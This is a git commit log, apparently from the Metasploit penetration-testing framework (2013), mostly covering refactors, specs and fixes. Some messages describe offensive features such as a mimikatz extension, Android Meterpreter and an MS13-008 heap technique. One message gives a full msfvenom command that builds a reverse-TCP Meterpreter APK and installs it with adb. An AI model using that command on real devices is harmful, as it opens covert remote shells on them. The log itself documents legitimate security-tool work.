2013-05-22 18:28:14 -04:00
Luke Imhoff
2b70ec2e08
Payload compatible cache_in_memory
...
[#47720609]
Msf::PayloadSet#add_module does NOT return an annotated module class as
Msf::ModuleSet#add_module does because a payload module is defined as a
ruby Module instead of a ruby Class. Since add_module doesn't always
return an annotated_class, the logic in
Msf::ModuleManager#on_module_load needed to change to NOT use
annotated_class and create #add_module as return [void]. Thus, it is
necessary to pass in all the metasploit module metadata to
Msf::ModuleManager#cache_in_memory instead of assuming they can be
derived from the (payload) Module or (other) Class.
2013-05-22 16:06:02 -05:00
David Maloney
69dd7f5c58
Update Mdm and Add Task stuff to report
...
make report_* methods aware of Tasks
[Story #49167601]
2013-05-22 14:59:43 -05:00
xard4s
314b0698ee
address feedback
2013-05-22 13:44:25 -04:00
Luke Imhoff
57576de85f
Update in-memory cache to fix file_changed?
...
[#47720609]
Msf::ModuleManager#module_info_by_path was not being updated when a
module was loaded, so if a load_module was called again, say during
start up of prosvc, the module would reload even though there was no
change in the file because file_changed? couldn't find an entry for the
module's path in module_info_by_path.
2013-05-22 12:28:42 -05:00
sinn3r
e2aad8930d
Landing #1853 - Remove ID tags
2013-05-22 12:12:55 -05:00
sinn3r
8483528ae0
Restore generic.rb to the correct state
2013-05-22 12:11:06 -05:00
sinn3r
1cf485fad1
Restore tcp.rb to its current state
2013-05-22 12:06:36 -05:00
sinn3r
162ecd7b45
Landing #1851 - Alias 'run' to 'exploit'
2013-05-22 11:56:04 -05:00
Luke Imhoff
eede80509f
Reuse appropriate terminology in docs
...
[#47720609]
Fix some docs and variable names to make it clearer when methods are
expecting module instance and module classes. Change some 'name'
variables to 'reference_name' since that's the proper terminology.
2013-05-21 08:19:47 -05:00
James Lee
f4498c3916
Remove $Id tags
...
Also adds binary coding magic comment to a few files
2013-05-20 16:21:03 -05:00
Luke Imhoff
89bd5b4791
Reset column information after running migrations
...
[#50179803]
[SeeRM #7967]
[SeeRM #7870]
Because metasploit-framework runs migrations with the same process and
with the same connection as it later accesses the database, the column
information can become cached prematurely and be incorrect by the end of
the migrations. Fix the bad cache by automatically resetting the column
information for all model classes after the migrations have run.
2013-05-20 13:08:07 -05:00
Luke Imhoff
398dcfa8cb
Merge branch 'master' into bug/migrations
2013-05-20 12:49:33 -05:00
Luke Imhoff
0e435d378c
Move Msf::DBManager#migrate(d) to module
...
[#50179803]
Move Msf::DBManager#migrate and the migrated attribute to
Msf::DBManager::Migration module to lower complexity of db_manager.rb
and in preparation for more migration related code on this branch.
2013-05-20 12:45:17 -05:00
James Lee
5e65976089
Alias 'run' to 'exploit'
...
Allows console users to use the 'run' command for exploits as well as
auxiliary and post, in the same way that 'exploit' works for all three.
Saves some typing and makes it do the right thing so users don't have to
remember what kind of module they're using.
2013-05-20 11:20:12 -05:00
agix
e48cfcae8e
delete a debug puts
2013-05-19 19:21:10 +02:00
agix
e844247163
Little change in exe-only to work with x64 arch.
2013-05-19 19:01:03 +02:00
John Sherwood
b22c5a0120
Add sorting functionality to cmd_notes
...
- Added sorting to cmd_notes
- Added make_sortable function so that sorts work happily even
when the disparate notes don't have content of the same types
in the fields the sort is requested over.
2013-05-17 23:02:38 -04:00
Luke Imhoff
82867fbb66
Prevent duplicate migrations_paths
...
[#50099107]
If Msf::DBManager#initialize_metasploit_data_models is run multiple
times, such as during specs, ActiveRecord::Migrator.migrations_paths was
getting populated with multiple copies of the metasploit_data_models
db/migrate path, which would lead to 'DB.migrate threw an exception:
Multiple migrations have the version number 0' errors in framework.log.
2013-05-17 14:56:17 -05:00
Alexandre Maloteaux
2a9dbb2654
msfvenom and exe-small fmt bug fix
2013-05-16 21:13:45 +01:00
bannedit
031bb2eb0b
Fix a backwards disasm bug which stomps on the depth option
2013-05-15 22:08:50 -04:00
James Lee
61afe1449e
Landing #1275, bash cmdstager
...
Conflicts:
lib/rex/exploitation/cmdstager.rb
Conflict was just the $Id$ tag, which is no longer used anyway.
2013-05-15 10:44:05 -05:00
Tod Beardsley
6457a968c9
Land #1829, uninvert note searching.
2013-05-15 07:14:19 -05:00
John Sherwood
063ef487e2
Fix typo in cmd_notes
2013-05-14 18:58:31 -04:00
sinn3r
2ee11f70f8
Landing #1824 - Support Python when generating payloads via msfpayload
...
We love Python users too.
2013-05-14 14:14:31 -05:00
Tasos Laskos
0a55c7e4b6
Proofs can be omitted if they contain sensitive data
2013-05-14 20:46:17 +03:00
Joshua J. Drake
96104c5860
Fix hard vs soft tabs
2013-05-13 20:44:51 -05:00
Joshua J. Drake
c71b57764e
Add a Python buffer formatter and update msfpayload to enable using it
2013-05-13 20:41:15 -05:00
Tasos Laskos
a12e59ef1f
Merge branch 'master' into bug/web-match_and_log_fingerprint
2013-05-14 01:55:37 +03:00
Tasos Laskos
f4bc3096b2
#match_and_log_fingerprint: store match not fingerprint
2013-05-10 19:59:12 +03:00
Luke Imhoff
afa04ac9d0
Merge branch 'master' into feature/mdm-module-namespace
2013-05-09 16:13:06 -05:00
Luke Imhoff
bc92b43408
Update to metasploit_data_models 0.11.0
...
[#47979793]
2013-05-09 13:25:26 -05:00
sinn3r
f9f769cec8
Landing #1805 - Fix unintelligible error when importing empty file
2013-05-08 20:10:45 -05:00
Luke Imhoff
a5648a8830
Merge branch 'master' into feature/mdm-module-namespace
...
Conflicts:
Gemfile
Gemfile.lock
lib/msf/core/db_manager.rb
2013-05-08 13:22:41 -05:00
James Lee
9ab68ac935
Fix unintelligible error when importing empty file
...
IO#read returns nil for an empty file if given a length argument, which
caused a stack trace when attempting to import a file instead of a
useful error message.
2013-05-07 18:05:45 -05:00
sinn3r
fe57b9d6e2
Landing #1784 - Handles nils in params
...
Nils are handled by converting values into strings
2013-05-02 18:43:10 -05:00
James Lee
9e7885857c
Land #1776, assembly payload blob cache fix
2013-05-02 16:58:14 -05:00
James Lee
0d9b120bac
Get rid of the suffix
...
This makes blob cache a little cleaner
[FixRM #7898]
2013-05-02 16:55:14 -05:00
Meatballs
7fb092c58c
Initial commit
2013-05-02 22:08:19 +01:00
jvazquez-r7
5cfc306466
Land @1785, @wchen-r7's API addition for the mstime ie8 technique
2013-05-02 00:00:49 -05:00
sinn3r
69f8103ffe
Make animatecolor element optional by using innerHTML
2013-05-01 14:21:52 -05:00
sinn3r
3d2cb9ec3f
Uses rand_text_hex for RGB values, and correcting exception handling
2013-05-01 13:41:36 -05:00
sinn3r
71afd762a9
According to MSFG, I can use RGB, so here goes
2013-04-30 18:48:21 -05:00
sinn3r
ae94fbdf6c
Updates documentation
2013-04-30 17:11:19 -05:00
sinn3r
9cc624456a
Adds function js_mstime_malloc
...
This function takes advantage of MSTIME's CTIMEAnimationBase::put_values
function that's suitable for a no-spray technique (based on wtfuzz's
PoC for MS13-008)
2013-04-30 16:40:10 -05:00
xard4s
930c9dc835
undo free bsd error handling
2013-04-30 16:32:37 -04:00
Tasos Laskos
6bf19c6fb8
HTTP::ClientRequest: Should handle nils in params
...
When hashes for params contain nils, they should be converted to empty
strings instead of crashing.
* #to_s: Calls #to_s on vars_get and vars_post data
* #set_encode_uri: Calls #to_s on its arg
2013-04-30 22:01:00 +03:00
kernelsmith
cf7702f7e9
"acitve" should be "aggressive"
...
fixes http://dev.metasploit.com/redmine/issues/7926 which prevented a
proper search using:
msf> search exploit:type app:server
2013-04-30 13:04:19 -05:00
Meatballs
293c847a32
Fix table.print
2013-04-29 22:02:41 -05:00
Meatballs
69dead8c8f
Tidier
2013-04-29 23:17:11 +01:00
Meatballs
36ef2cb5a1
x86 warning for mimikatz
2013-04-29 23:14:32 +01:00
Meatballs
02788f71d9
Fix table.print
2013-04-29 22:37:02 +01:00
James Lee
d53d6370b3
Land #1747, mimikatz meterpreter extension
...
[Closes #1747]
See rapid7/meterpreter#9
2013-04-29 14:45:07 -05:00
James Lee
906863676e
Fix a logic error in HttpServer
...
When a module is configured to listen on the INADDR_ANY interface, with
a payload that does not have an LHOST option, it attempts to determine
the srvhost from a client socket which would only be available when the
module has included the TcpClient mixin (i.e., it is both passive and
aggressive stance), causing a NameError for the undefined +sock+.
This commit fixes the problem in two ways:
1. It changes the default cli in get_uri to be the module's self.cli,
which should always be set when passive modules would need it (e.g., in
the on_request_uri method).
2. It adds a check to make sure that the calling module has a sock
before trying to get its peerhost. This was @marthieubean's suggested
solution in #1775.
[Closes #1775]
2013-04-29 13:44:58 -05:00
Raphael Mudge
21f8e19d55
Single Payloads Cache Assembled Payload Improperly
...
An earlier change to the framework (prepend_migrate) forced single
payloads to use the internal_generate method of payload.rb.
internal_generate calls build which has a cache to track assembled
payloads. This method assumes that a payload only needs to be
assembled once, with optional values patched in later.
Single payloads do not work this way. Each time they are generated
new assembly source is created with the options hardcoded in.
This fix updates build to use the hashcode of the assembly code as
part of the cache key.
This fixes #7898 -- a bug that prevents a user from generating
multiple variations of a single payload without a restart.
2013-04-29 11:54:53 -04:00
sinn3r
1d9a695d2b
Landing #1772 - Adds phpMyadmin Preg_Replace module (CVE-2013-3238)
...
[Closes #1772]
2013-04-28 12:17:16 -05:00
Meatballs
8bfaa41723
Fix x64 dll creation
2013-04-27 20:44:46 +01:00
Meatballs
bbd53a2dbd
Add domain to get_cookies
2013-04-26 20:34:21 +01:00
Meatballs
b25b9e769c
Msftidy
2013-04-26 20:30:04 +01:00
Meatballs
1f2cab7aef
Tidyup and getcookies
2013-04-26 20:26:04 +01:00
Luke Imhoff
249a09cd52
Update to metasploit_data_models 0.7.1
...
[#47979793]
2013-04-26 13:14:38 -05:00
Meatballs
9ad19ed2bf
Final tidyup
2013-04-26 15:41:28 +01:00
Meatballs
c7ac647e4e
Initial attempt lfi
2013-04-26 14:32:18 +01:00
sinn3r
b1e49e7116
Merge branch 'master' of github.com:rapid7/metasploit-framework into upstream-master
2013-04-25 20:54:28 -05:00
sinn3r
5b0ae1476b
Let's word this a little differently
2013-04-25 20:52:51 -05:00
Meatballs
b58a775af5
Added opt delay to file_dropper
2013-04-25 20:52:51 -05:00
sinn3r
008266a581
Corrects documentation. Thanks Meatballs1
2013-04-25 19:13:16 -05:00
Meatballs
d8430c83cf
Add simple rspec
2013-04-26 00:47:00 +01:00
Meatballs
668dd78587
Msftidy
2013-04-26 00:21:31 +01:00
Meatballs
e2bf4882f0
Add domain join parse
2013-04-26 00:20:10 +01:00
Meatballs
235887ccb5
Finished
2013-04-25 23:25:05 +01:00
sinn3r
ff87e3622b
Changes made according to feedback from Juan and James
2013-04-25 15:19:44 -05:00
Luke Imhoff
9207ed6532
Msf::Ui::Console::CommandDispatcher::Core#search_modules_sql spec
...
[#47979793]
2013-04-25 14:33:13 -05:00
James Lee
6767eee08a
Add in-line signing
...
Signing the generated APK in the module means users don't have to have
keytool or jarsigner to create a working package.
Example usage:
./msfvenom -p android/meterpreter/reverse_tcp \
LHOST=192.168.99.1 LPORT=2222 -f raw > meterp.apk
adb install ./meterp.apk
2013-04-25 13:57:54 -05:00
Luke Imhoff
24b97137ea
Msf::DBManager Mdm::Module* specs
...
[#47979793]
2013-04-25 09:46:53 -05:00
sinn3r
6642545551
Adds new JavaScript function "js_download"
...
"js_download" is a JavaScript function used to download data (text
or binary) from the web server.
2013-04-24 17:36:45 -05:00
James Lee
93bddd9041
Improved docs and partial specs for Rex::Text
...
Conflicts:
lib/msf/core/modules/loader/base.rb
lib/rex/poly/block.rb
lib/rex/text.rb
2013-04-23 17:24:03 -05:00
xard4s
cc52619a14
Fix trailing whitespace in zip files
2013-04-23 13:53:38 -04:00
Meatballs
fab1781812
Refactored to send custom commands
2013-04-22 10:04:38 +01:00
Meatballs
6656514616
Msftidy
2013-04-21 14:34:47 +01:00
Meatballs
fc621e8d7e
Parse ssp correctly
2013-04-21 10:55:01 +01:00
Meatballs
83fbc3e46f
Small fix and attribution to gentilkiwi
2013-04-21 00:36:43 +01:00
Luke Imhoff
492b081280
Msf::DBManager::Export#extract_module_detail_info spec
...
[#47979793]
2013-04-20 16:44:42 -05:00
Meatballs
cec737d399
tidy and table header
2013-04-20 18:05:47 +01:00
Meatballs
b219a23f00
Refactoring
2013-04-20 18:00:46 +01:00
Meatballs
20849714ac
Add all methods
2013-04-20 17:27:32 +01:00
Meatballs
ddaa09edad
Added msv
2013-04-20 16:31:45 +01:00
Meatballs
83578dec68
Getprivs by default
2013-04-20 14:59:07 +01:00
Meatballs
a23d7bb66f
Add client UI and parse results
2013-04-20 12:20:38 +01:00
Meatballs
5fa81942db
Initial comms
2013-04-19 22:19:50 +01:00
Luke Imhoff
e5befb7094
Msf::DBManager#report_session specs
...
[#47979793]
2013-04-19 10:11:33 -05:00
Nathan Einwechter
f8fc05bbf9
streamline var assignment
2013-04-18 17:05:28 -04:00
Nathan Einwechter
c758831962
streamline var assignment
2013-04-18 17:04:03 -04:00
Nathan Einwechter
d9187056c8
msftidy
2013-04-18 13:14:26 -04:00
Nathan Einwechter
288111be4e
Fixes RM7883 along with related issue
...
modified: lib/msf/ui/console/command_dispatcher/db.rb
2013-04-18 13:08:32 -04:00
Josh
c23cf47d74
Fix RM7896, global show opts has non-eval #{text}
...
thx to mudge for reporting & jduck for properly blaming me.
This change also causes the actual DefaultPromptChar to be displayed vs a hard coded ">"
2013-04-15 22:07:28 -05:00
Tod Beardsley
25fcbd4e70
Landing #1733, setting a sensible heapspray offset
...
@wchen-r7 says that nobody's using it today, much less relying on the
default, so this should make no functional difference to any browser
exploits.
2013-04-15 16:32:48 -05:00
Tod Beardsley
4d21c7dff5
Landing #1727, adding @jlee-r7's new fingerprints
2013-04-15 13:49:59 -05:00
Tod Beardsley
7f8040c4e4
Lands #1722, Rex::Socket comment docs
2013-04-15 13:44:00 -05:00
Luke Imhoff
2c681005c0
Msf::ModuleManager::Cache spec coverage
...
[#47979793]
2013-04-15 13:08:12 -05:00
Meatballs
67791c12a5
Small tidy
2013-04-14 11:18:45 +01:00
Meatballs
26479bbe82
Fixup resolve_host
2013-04-14 10:58:51 +01:00
Meatballs
6a7fc70274
Remove length stuff
2013-04-14 10:54:19 +01:00
Meatballs
6bca2b305f
Typo
2013-04-14 10:44:00 +01:00
Meatballs
849b42ffb9
Further tidy
2013-04-14 10:42:15 +01:00
Meatballs
4b4f77eb0f
Finalize
2013-04-14 10:32:56 +01:00
timwr
df9c5f4a80
remove unused resources and fix whitespace
2013-04-13 16:22:52 +01:00
scriptjunkie
2c41ca6598
Merge branch 'encoding_fix' of git://github.com/rsmudge/metasploit-framework
2013-04-12 21:10:44 -05:00
sinn3r
d28db8a2a3
Forgot the comment
2013-04-12 20:21:10 -05:00
sinn3r
f2cbbf43e8
Changes default offset
...
Points to the beginning of the block
2013-04-12 20:19:47 -05:00
timwr
32bd812bdb
android meterpreter
2013-04-12 18:57:04 +01:00
James Lee
2c8ec656ca
Typo
2013-04-11 22:36:08 -05:00
James Lee
7df80c7aac
Add a couple new IE fingerprints to osdetect.js
2013-04-11 22:29:02 -05:00
RageLtMan
1e93ae65e3
fix typo in parameters
2013-04-11 19:12:32 -04:00
RageLtMan
5ac18e9156
comment update
2013-04-11 19:11:25 -04:00
RageLtMan
6eb33ae5ed
Rex::Socket::SslTcp set cipher and verify_mode
...
Update Rex::Socket::SslTcp to accept verification mode string from
Rex::Socket::Parameters, which has been modified accordingly.
Add SSLVerifyMode and SSLCipher options (params and socket work
were done before, but the option was not exposed) to
Msf::Exploit::Tcp.
Testing:
```
>> sock = Rex::Socket::Tcp.create('PeerHost'=>'10.1.1.1','PeerPort'
=>443,'SSL' => true, 'SSLVerifyMode' => 'NONE')
>> sock.sslctx.verify_mode
=> 0
>> sock.close
=> nil
>> sock = Rex::Socket::Tcp.create('PeerHost'=>'10.1.1.1','PeerPort'
=>443,'SSL' => true, 'SSLVerifyMode' => 'PEER')
=> #<Socket:fd 13>
>> sock.sslctx.verify_mode
=> 1
```
Note: this should be able to resolve the recent SSL socket hackery
of exploit/linux/misc/nagios_nrpe_arguments.
2013-04-11 18:00:33 -04:00
James Lee
6a0b240d10
Add some better docs for Rex::Socket
2013-04-10 12:41:41 -05:00
Rob Fuller
2949c4a339
enable stage encoding for reverse_http(s)
2013-04-10 12:10:17 -03:00
Tod Beardsley
6a5d318749
Bumping version.
2013-04-10 08:59:56 -05:00
Meatballs
e4ff7a2f2c
Address egypt's feedback
2013-04-09 21:15:04 +01:00
sinn3r
277bc69140
Merge branch 'bug/rm7288-post-rename' of github.com:jlee-r7/metasploit-framework into jlee-r7-bug/rm7288-post-rename
2013-04-08 10:18:09 -05:00
Meatballs
3660ad8c0a
Initial attempt
2013-04-07 23:03:43 +01:00
Tod Beardsley
bbce53816c
Merges #1706 , removing gemcache per brandont
...
This has been put off for a long while.
2013-04-05 10:12:04 -05:00
James Lee
cd86a69090
Have Post::File use shiny new session.fs.file.mv
...
Also adds a quick and dirty test. Verified working on Linux shell, Linux
meterpreter, and Windows x86 and x64 meterpreter.
2013-04-05 01:24:24 -05:00
James Lee
067140643e
Landing #1579, meterpreter mv
...
See rapid7/meterpreter/#6
2013-04-04 23:42:31 -05:00
James Lee
ad46b46684
Landing #1463, Meatballs' cdecl fixes
2013-04-04 22:58:59 -05:00
Brandon Turner
6251dd571e
Always use bundler to load gems
2013-04-04 16:41:40 -05:00
Brandon Turner
06537e0ab1
Remove the gemcache loader and tools
2013-04-03 16:24:56 -05:00
Brandon Turner
8ceede6460
Remove the gemcache
2013-04-03 16:24:55 -05:00
Luke Imhoff
809969b49f
Merge branch 'master' into feature/patchable-web-vuln-import
2013-04-02 22:38:54 -05:00
Luke Imhoff
47842aa6a2
Fix 'Output is not a module'
...
[#46491831]
I missed that Rex::Ui::Text::Output was a class and not a module, so
starting up prosvc fell over when it loaded
rex/ui/text/output/buffer/stdout, which also would screw up
msf/ui/console/command_dispatcher/core.rb where I originally added
Rex::Ui::Text::Output::Buffer::Stdout.
2013-04-01 20:16:28 -05:00
Tasos Laskos
f1bc4a76c5
Anemone::Page#links: removed upwards dir traversal
...
[Finishes #47241427]
2013-04-02 00:49:40 +03:00
Luke Imhoff
0bb79ba890
Msf::DBManager#import_msf_xml refactor
...
[#46491831]
Move Msf::DBManager#import_msf_xml into
Msf::DBManager::ImportMsfXml#import_msf_xml and include
Msf::DBManager::ImportMsfXml to cut down size of the infamous db.rb.
Break up #import_msf_xml to have separate methods for parsing web_forms,
web_pages, and web_vulns. The method for
web_vulns, #import_msf_web_vuln_element is needed so that it can be overridden in
Pro to handle the Pro-only changes to Mdm::WebVuln.
2013-04-01 16:06:40 -05:00
Luke Imhoff
2317e9cced
Fix yard tag warnings
...
[#46491831]
2013-03-30 17:13:12 -05:00
Luke Imhoff
7ed2812ec3
Fix Cannot resolve link YARD warnings
...
[#46491831]
2013-03-30 16:58:49 -05:00
Luke Imhoff
bc4b87ebd9
Fix Undocumentable method defined on object instance YARD warnings
...
[#46491831]
Change code to use format that YARD can document without changing
semantics.
2013-03-30 16:05:12 -05:00
Luke Imhoff
c210260845
Fix Undocumentable method, missing name YARD warning
...
[#46491831]
Comments at the start of the file with ## caused YARD to think the
comment was documenting the require call. By removing the ##, the
warning disappeared. I did not determine what is special about ## in
file comments.
2013-03-30 15:32:38 -05:00
Tasos Laskos
e9b183cda2
Anemone::Page#links: restored upwards dir traversal
...
[FIXRM #7853]
2013-03-29 23:07:46 +02:00
sinn3r
463725efec
Merge branch 'bug/winrm_poke' of github.com:dmaloney-r7/metasploit-framework into dmaloney-r7-bug/winrm_poke
2013-03-29 09:30:21 -05:00
RageLtMan
0adb30c87a
whitespace cleanup
2013-03-28 04:11:52 -04:00
RageLtMan
ed3b1cecd4
Rex::Text::Ui::Table.new[find_by_colnames]
...
Add :[] to ...Ui::Table allowing user to pass multiple colnames.
Returns a new table with only those columns and their rows.
Useful when using Rex to filter output, prep CSV, etc.
Testing:
```
t = Rex::Ui::Text::Table.new('Columns' => ['a','b','c'])
t << ['x','y','z']
t << ['p','q','r']
t['a','c']
=> a c
- -
p r
x z
```
2013-03-28 04:02:31 -04:00
scriptjunkie
79a72a18a9
Merge branch 'exe_only_patch' of git://github.com/agix/metasploit-framework
2013-03-27 18:30:07 -05:00
sinn3r
7bf87f3546
Merge branch 'mipsbe_elf' of github.com:jvazquez-r7/metasploit-framework into jvazquez-r7-mipsbe_elf
2013-03-27 11:55:09 -05:00
Tasos Laskos
380f5f56ae
Auxiliary::Web::HTTP#_request: print_error => elog
...
[SEERM #7839]
Reverted earlier commit.
2013-03-27 16:36:50 +02:00
David Maloney
a87e414274
fix winrm poke method
2013-03-26 13:05:33 -05:00
jvazquez-r7
a644ceb016
Added support for mipsbe elf
2013-03-26 17:20:43 +01:00
jvazquez-r7
4fff624632
added initial support for ELF misple
2013-03-26 01:08:31 +01:00
David Maloney
509ae76dc9
make sure we grab the workspace for store_local
...
store_local calls report note from db.rb directly instead of going
through the report method. This means we might miss the workspace,
causing a stack trace.
2013-03-22 16:52:38 -05:00
sinn3r
0634cb9892
Need to avoid badchar 0x00
...
0x00 becomes double null, which functions like a terminator
2013-03-22 13:18:32 -05:00
sinn3r
566806487c
Randomize the "div_container" var because it's global
...
It's best to randomize this variable name because it's global.
2013-03-22 13:16:14 -05:00
sinn3r
1ac31a3e12
Merge branch 'bug/web-path-api-update' of github.com:tasos-r7/metasploit-framework into tasos-r7-bug/web-path-api-update
2013-03-22 12:54:23 -05:00
Tod Beardsley
bf85545b4d
Fix egypt's typo
2013-03-20 17:15:14 -05:00
Brandon Turner
49963ad4f1
Update MDM in gemcache
2013-03-20 13:23:40 -05:00
sinn3r
cce74246d8
Merge branch 'master' of github.com:rapid7/metasploit-framework
2013-03-19 15:03:24 -05:00
Tod Beardsley
6618c098c4
Merges 'bug/obsolete-activerecord-patch'
...
Not only does this remove the patch, but adds in specs to cover the test
cases that the patch resolved. Verified all steps and landed #1592 before
landing #1611, so this is complete.
[Closes #1611]
2013-03-19 13:10:42 -05:00
Tod Beardsley
d987693238
Merges 'feature/rake-db'
...
Implements rake db tasks for Metasploit Framework. Woot! Verified all
steps listed in #1592 as well.
[Closes #1592]
2013-03-19 12:56:59 -05:00
Tasos Laskos
11c38d925b
Auxiliary::Web::Path: Fuzzable API update
...
[FIXRM #7817]
Path object was using an outdated fuzzable API which was causing
scan errors.
2013-03-19 18:41:52 +02:00
Tasos Laskos
ad39a5cdc3
Auxiliary::Web::HTTP#_request: elog => print_error
...
[SEERM #7815]
Switched from elog to print_error to make reporting bugs easier on users.
2013-03-19 17:18:44 +02:00
Tod Beardsley
1873053a34
Restore win32pe as the default (not _only)
2013-03-18 15:55:01 -05:00
Tod Beardsley
3a183ffa94
Retabbed for consistent whitespace
2013-03-18 15:40:26 -05:00
Tod Beardsley
418a373f6c
Avoid merge conflict over Id SVN tag
2013-03-18 15:39:16 -05:00
Tod Beardsley
afcbaffa2b
Revert "add -R capability like hosts -R"
...
Pulling out the set_rhosts_from_addrs -- that's not required for
grep-like functionality, and adding this method to the global namespace
is undesirable.
This reverts commit 52596ae3b4.
2013-03-18 15:28:19 -05:00
Tod Beardsley
91e3f4cca6
Merge 'kernelsmith/msfconsole-grep'
...
Resolved a conflict between grep and go_pro (go_pro was added after
grep). Adds @kernelsmith's grep command. Josh is determined to have
msfconsole be his default shell, it seems.
[Closes #1320]
Conflicts:
lib/msf/ui/console/command_dispatcher/core.rb
2013-03-18 14:39:45 -05:00
Luke Imhoff
2075a7b46c
Remove active_record patch
...
[#46141013]
Version 3.2.12 of activerecord contains the changes that the original
patch made so the patch is no longer needed.
2013-03-18 11:32:21 -05:00
Luke Imhoff
f1a4fd937a
Specs for activerecord patch
...
[#46141013]
Spec the desired behavior for ConnectionPool prior to removing the patch
to sync with upstream 3.2.12.
2013-03-18 11:01:45 -05:00
Meatballs
f9327d169b
msftidy
2013-03-17 14:31:40 -04:00
Meatballs
b6da5f84bb
Refactor
2013-03-17 14:09:00 -04:00
Luke Imhoff
2604fad164
Allow use of rake db tasks
...
[#46224565]
The following rake tasks are added and work similar to how they work in
rails apps:
* db:create
* db:drop
* db:migrate
* db:migrate:status
* db:rollback
* db:schema:dump
* db:schema:load
* db:seed (but no db seeds defined at this time)
* db:setup
* db:version
The hidden task db:test:prepare is also available, which means `rake
spec` can depend on it so that the test database is dropped and
recreated from the development database when running specs (Although
there are yet to be database tests, this branch is in preparation for
that work that will be split between multiple developers.)
2013-03-14 15:46:18 -05:00
Tod Beardsley
f46ec73ff0
Fix up usage help for loot cmd
2013-03-14 14:37:15 -05:00
Tod Beardsley
3dca63fee2
Make it clear that you're deleting all loot
...
You don't get to delete just one chunk of loot.
2013-03-14 14:37:15 -05:00
Joshua Abraham
56611230ff
fixed header
2013-03-14 14:37:15 -05:00
Joshua Abraham
0ca0cd5ee1
loot add/remove command for msfconsole
2013-03-14 14:37:15 -05:00
Tasos Laskos
5967991f6f
Auxiliary::Web#log_*: details[:category] => #name
...
Recent category updates to modules caused variations of vulns of the
same type to be ignored leading to a smaller exploitation surface.
Thus, use the #name of the module as the key instead of the category name.
2013-03-12 19:43:47 +02:00
James Lee
32bf7cf8f4
Merge remote-tracking branch 'tasos-r7/bug/web-fuzzable-path' into rapid7
...
[Closes #1578]
2013-03-12 12:31:32 -05:00
RageLtMan
d399093d80
Add Framework side of stdapi.fs.file.mv
...
Add the appropriate methods to Rex side of the FS extension and
the commensurate command dispatcher.
Requires https://github.com/rapid7/meterpreter/pull/6 from the
meterpreter repo as well as compiling fresh DLL for
ext_server_stdapi.
2013-03-12 02:06:38 -04:00
Tasos Laskos
c641ca96c1
Auxiliary::Web::Path.from_model: inputs => form.inputs
...
Fixed uninitialized variable error.
2013-03-11 23:08:41 +02:00
Raphael Mudge
d764740779
Convert user/pass tokens to ASCII in db.rb
...
This commit fixes an Encoding::CompatibilityError incompatible
encoding regexp match (ASCII-8BIT regexp with UTF-8 string) when
sanitizing non-printable tokens from a user/pass string.
The UTF-8 strings are derived from strings passed through the
module.execute RPC call.
2013-03-11 15:02:28 -04:00
jvazquez-r7
f0cee29100
modified CommandDispatcher::Exploit to take the change into account
2013-03-11 18:08:46 +01:00
Meatballs
756dec6fcc
Msftidy EXE
2013-03-10 20:56:21 +00:00
Meatballs
71a38b81dd
Added generation to Exploit::EXE
2013-03-10 20:54:37 +00:00
dmaloney-r7
87f84513bf
Merge pull request #1564 from rapid7/feature/metasploit_data_models-0.6.2
...
Update to metasploit_data_models 0.6.2
2013-03-09 13:49:48 -08:00
Meatballs
3acb2f561a
Retab
2013-03-09 17:59:20 +00:00
Meatballs
465c00c5ff
Msftidy msi sections
2013-03-09 17:25:59 +00:00
Meatballs
f37d9c2834
Initial commit
2013-03-09 17:24:03 +00:00
Spencer McIntyre
bf54b582c9
Condense the decoder commands
2013-03-08 16:29:03 -05:00
Tasos Laskos
7e15788bb5
Auxiliary::Web: updated form of vuln storage in parent
...
#log_fingerprint and #log_resource now create a key in the
parent's #vulns attribute with the name of the vuln type and
store the details of each such vuln under it.
2013-03-08 22:38:23 +02:00
Spencer McIntyre
8b5a83c7f5
Remove the DECODER option
2013-03-08 15:25:16 -05:00
Tasos Laskos
ac6065d8f9
Merge remote-tracking branch 'upstream/master' into bug/web-vuln-logging
2013-03-08 21:50:49 +02:00
Tasos Laskos
3422a7c098
Auxiliary::Web: force vuln proof to_s
2013-03-08 21:50:01 +02:00
Spencer McIntyre
aceba9fc8a
Revert "escape ticks and spaces in paths"
...
This reverts commit 4c87b1ba36.
2013-03-08 14:37:28 -05:00
James Lee
0a9b00e24c
Apparently missed part of mubix's original changes
...
Used by auxiliary/admin/smb/list_directory
2013-03-07 21:20:46 -06:00
Luke Imhoff
397361f5c6
Update gemcache to metasploit_data_models 0.6.2
2013-03-07 20:41:33 -06:00
James Lee
db676f1a88
Whitespace at EOL
2013-03-07 18:20:08 -06:00
James Lee
c3fa62cd59
Whitespace at EOL
2013-03-07 18:16:57 -06:00
Brandon Turner
725fbea851
Merge pull request #1563 from rapid7/bug/yard-guard
...
[Story #45771305]
Conflicts:
Rakefile
2013-03-07 17:35:03 -06:00
James Lee
43c076ed96
Merge remote-tracking branch 'tasos-r7/bug/web-vuln-logging' into rapid7
...
[Closes #1559]
2013-03-07 17:23:59 -06:00
Luke Imhoff
e912bec2db
Update gemcache to metasploit_data_models 0.6.1
...
[#45771305]
2013-03-07 14:30:29 -06:00
Meatballs
df3361df50
Merge branch 'master' into wds_scanner_repull
2013-03-07 20:09:44 +00:00
James Lee
f05431791f
Merge branch 'dmaloney-r7-feature/ssl/add_cipher_support' into rapid7
2013-03-07 12:54:39 -06:00
James Lee
27f43d3d1c
Param name goes before type
2013-03-07 12:50:43 -06:00
James Lee
c41bfa9141
Whitespace
2013-03-07 12:45:01 -06:00
Tasos Laskos
cf3df4b179
Auxiliary::Web::HTTP: added error output
...
Instead of using elog when an HTTP request callback throws an
exception, use the HTTP class' parent #print_error.
2013-03-07 20:14:38 +02:00
David Maloney
06443ea4d0
yarddoc cleanup
2013-03-07 11:52:58 -06:00
David Maloney
007b26d918
dry up enumerators
2013-03-07 11:35:34 -06:00
David Maloney
7332d31523
fix some style things for egypt
2013-03-07 11:11:48 -06:00
Tasos Laskos
c3b3da4254
Merge remote-tracking branch 'upstream/master' into bug/web-vuln-logging
2013-03-06 23:04:10 +02:00
James Lee
5dff043e3c
Whitespace
2013-03-06 14:52:32 -06:00
Tasos Laskos
d9a6f5f0ca
Merge remote-tracking branch 'upstream/master' into bug/web-vuln-logging
2013-03-06 18:26:18 +02:00
Tasos Laskos
c497d5ffef
Auxiliary::Web: log methods pass vuln info to parent
2013-03-06 18:25:25 +02:00
Samuel Huckins
09fc52f3d9
Merge pull request #1536 from rapid7/feature/active-record-migrator-migrations-paths
...
Use ActiveRecord::Migrator multiple migrations paths support
2013-03-06 08:20:36 -08:00
Luke Imhoff
fac941aae4
